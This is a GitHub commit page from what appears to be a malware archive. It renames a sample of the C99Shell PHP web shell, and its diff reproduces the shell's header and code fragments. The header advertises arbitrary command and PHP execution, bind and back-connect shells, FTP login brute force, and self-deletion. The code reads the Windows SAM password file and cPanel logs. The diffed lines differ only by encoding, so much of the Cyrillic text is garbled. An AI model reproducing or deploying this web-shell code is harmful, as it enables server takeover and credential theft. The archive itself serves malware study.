Rename Backdoor.PHP.C99Shell.i to Backdoor.PHP.C99Shell.Beta.b

This commit is contained in:
vxunderground 2020-10-15 20:50:44 -05:00 committed by GitHub
parent 1a7c3bacb2
commit c4b236d100
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -2,49 +2,49 @@
/* /*
****************************************************************************************************** ******************************************************************************************************
* *
* c99shell.php v.1.0 beta (от 2.05.2005) * c99shell.php v.1.0 beta (îò 2.05.2005)
* Freeware license. * Freeware license.
* © CCTeaM. * © CCTeaM.
* c99shell - файл-менеджер через www-броузер, "заточеный" для взлома. * c99shell - ôàéë-ìåíåäæåð ÷åðåç www-áðîóçåð, "çàòî÷åíûé" äëÿ âçëîìà.
* Вы можете бесплатно скачать последнюю версию на домашней страничке продукта: * Âû ìîæåòå áåñïëàòíî ñêà÷àòü ïîñëåäíþþ âåðñèþ íà äîìàøíåé ñòðàíè÷êå ïðîäóêòà:
http://ccteam.ru/releases/c99shell http://ccteam.ru/releases/c99shell
* *
* WEB: http://ccteam.ru * WEB: http://ccteam.ru
* UIN: 656555 * UIN: 656555
* *
* Особенности: * Îñîáåííîñòè:
* + управление локальными и удаленными (ftp, samba *) файлами/папками, сортировка * + óïðàâëåíèå ëîêàëüíûìè è óäàëåííûìè (ftp, samba *) ôàéëàìè/ïàïêàìè, ñîðòèðîâêà
* закачивание скачивание файлов и папок * çàêà÷èâàíèå ñêà÷èâàíèå ôàéëîâ è ïàïîê
* (предворительно упаковывается/распаковывается через tar *) * (ïðåäâîðèòåëüíî óïàêîâûâàåòñÿ/ðàñïàêîâûâàåòñÿ ÷åðåç tar *)
* продвинутый поиск (возможен внутри файлов) * ïðîäâèíóòûé ïîèñê (âîçìîæåí âíóòðè ôàéëîâ)
* modify-time и access-time у файлов не меняются при редактировании файлов (выкл./вкл. параметром $filestealth) * modify-time è access-time ó ôàéëîâ íå ìåíÿþòñÿ ïðè ðåäàêòèðîâàíèè ôàéëîâ (âûêë./âêë. ïàðàìåòðîì $filestealth)
* + продвинутый SQL-менеджер не уступающий phpmyadmin, * + ïðîäâèíóòûé SQL-ìåíåäæåð íå óñòóïàþùèé phpmyadmin,
просмотр/создание/редактирование БД/таблиц, просмотр файлов через брешь в mysql ïðîñìîòð/ñîçäàíèå/ðåäàêòèðîâàíèå ÁÄ/òàáëèö, ïðîñìîòð ôàéëîâ ÷åðåç áðåøü â mysql
* + управление процессами unix-машины (возможна сортировка), и "прибивание" процесса. * + óïðàâëåíèå ïðîöåññàìè unix-ìàøèíû (âîçìîæíà ñîðòèðîâêà), è "ïðèáèâàíèå" ïðîöåññà.
* + удобное (иногда графическое) выполнение shell-команд (много алиасов, можно легко добавлять/удалять алиасы) * + óäîáíîå (èíîãäà ãðàôè÷åñêîå) âûïîëíåíèå shell-êîìàíä (ìíîãî àëèàñîâ, ìîæíî ëåãêî äîáàâëÿòü/óäàëÿòü àëèàñû)
* + выполнение произвольного PHP-кода * + âûïîëíåíèå ïðîèçâîëüíîãî PHP-êîäà
* + быстрый локальный анализ безопасности ОС * + áûñòðûé ëîêàëüíûé àíàëèç áåçîïàñíîñòè ÎÑ
* + быстрое ftp-сканирование на связки login;login из /etc/passwd (обычно дает доступ к 1/100 аккаунтов) * + áûñòðîå ftp-ñêàíèðîâàíèå íà ñâÿçêè login;login èç /etc/passwd (îáû÷íî äàåò äîñòóï ê 1/100 àêêàóíòîâ)
* постраничный вывод, сортировка, групповые операции над БД/таблицами, управление процессами SQL) * ïîñòðàíè÷íûé âûâîä, ñîðòèðîâêà, ãðóïïîâûå îïåðàöèè íàä ÁÄ/òàáëèöàìè, óïðàâëåíèå ïðîöåññàìè SQL)
* + скрипт "любит" include: автоматически ищет переменные с дескрипторами и вставляет их в ссылки (опциально) * + ñêðèïò "ëþáèò" include: àâòîìàòè÷åñêè èùåò ïåðåìåííûå ñ äåñêðèïòîðàìè è âñòàâëÿåò èõ â ññûëêè (îïöèàëüíî)
также можно изменить $surl (базовый путь) как через конфигурацию (принудительно) так и через cookie "c99sh_surl", òàêæå ìîæíî èçìåíèòü $surl (áàçîâûé ïóòü) êàê ÷åðåç êîíôèãóðàöèþ (ïðèíóäèòåëüíî) òàê è ÷åðåç cookie "c99sh_surl",
идет авто-установка содержания $set_surl èäåò àâòî-óñòàíîâêà ñîäåðæàíèÿ $set_surl
* + возможность "забиндить" /bin/bash на определенный порт с произвольным паролем, * + âîçìîæíîñòü "çàáèíäèòü" /bin/bash íà îïðåäåëåííûé ïîðò ñ ïðîèçâîëüíûì ïàðîëåì,
* или сделать back connect (производится тестирование соеденения, и выводятся параметры для запуска NetCat). * èëè ñäåëàòü back connect (ïðîèçâîäèòñÿ òåñòèðîâàíèå ñîåäåíåíèÿ, è âûâîäÿòñÿ ïàðàìåòðû äëÿ çàïóñêà NetCat).
* + возможность быстрого само-удаления скрипта * + âîçìîæíîñòü áûñòðîãî ñàìî-óäàëåíèÿ ñêðèïòà
* * - успех полностью зависит от конфигурации PHP * * - óñïåõ ïîëíîñòüþ çàâèñèò îò êîíôèãóðàöèè PHP
* *
* В общем нужно увидеть всё это! *  îáùåì íóæíî óâèäåòü âñ¸ ýòî!
* *
* Ожидаемые изменения: * Îæèäàåìûå èçìåíåíèÿ:
* ~ Развитие sql-менеджера * ~ Ðàçâèòèå sql-ìåíåäæåðà
* ~ Добавление недостающих расширений файлов (просьба отправлять в icq #656555) * ~ Äîáàâëåíèå íåäîñòàþùèõ ðàñøèðåíèé ôàéëîâ (ïðîñüáà îòïðàâëÿòü â icq #656555)
* *
* ~-~ Пишите обо всех найденых недоработках, желаемых изменениях и доработках (даже о самых незначительных!) * ~-~ Ïèøèòå îáî âñåõ íàéäåíûõ íåäîðàáîòêàõ, æåëàåìûõ èçìåíåíèÿõ è äîðàáîòêàõ (äàæå î ñàìûõ íåçíà÷èòåëüíûõ!)
в icq #656555, будут рассмотрены все предложения и пожелания. â icq #656555, áóäóò ðàññìîòðåíû âñå ïðåäëîæåíèÿ è ïîæåëàíèÿ.
* *
* 2.05.2005 © Captain Crunch Security TeaM * 2.05.2005 © Captain Crunch Security TeaM
* *
* Coded by tristram * Coded by tristram
****************************************************************************************************** ******************************************************************************************************
@ -654,7 +654,7 @@ function mysql_query_form()
if ($tbl_struct) if ($tbl_struct)
{ {
echo "<td valign=\"top\"><b>Fields:</b><br>"; echo "<td valign=\"top\"><b>Fields:</b><br>";
foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
echo "</td></tr></table>"; echo "</td></tr></table>";
} }
} }
@ -936,7 +936,7 @@ if ($act == "sql")
{ {
echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
$c = 0; $c = 0;
while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
if (!$c) {echo "No tables found in database.";} if (!$c) {echo "No tables found in database.";}
} }
} }
@ -1232,7 +1232,7 @@ if ($act == "sql")
$i++; $i++;
} }
echo "<tr bgcolor=\"000000\">"; echo "<tr bgcolor=\"000000\">";
echo "<td><center><b>»</b></center></td>"; echo "<td><center><b>»</b></center></td>";
echo "<td><center><b>".$i." table(s)</b></center></td>"; echo "<td><center><b>".$i." table(s)</b></center></td>";
echo "<td><b>".$trows."</b></td>"; echo "<td><b>".$trows."</b></td>";
echo "<td>".$row[1]."</td>"; echo "<td>".$row[1]."</td>";
@ -1464,7 +1464,7 @@ if ($act == "security")
{ {
$v = $_SERVER["WINDIR"]."\repair\sam"; $v = $_SERVER["WINDIR"]."\repair\sam";
if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";} if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";}
else {echo "<b><font color=\"green\">You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";} else {echo "<b><font color=\"green\">You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
} }
if (file_get_contents("/etc/userdomains")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} if (file_get_contents("/etc/userdomains")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";} if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";}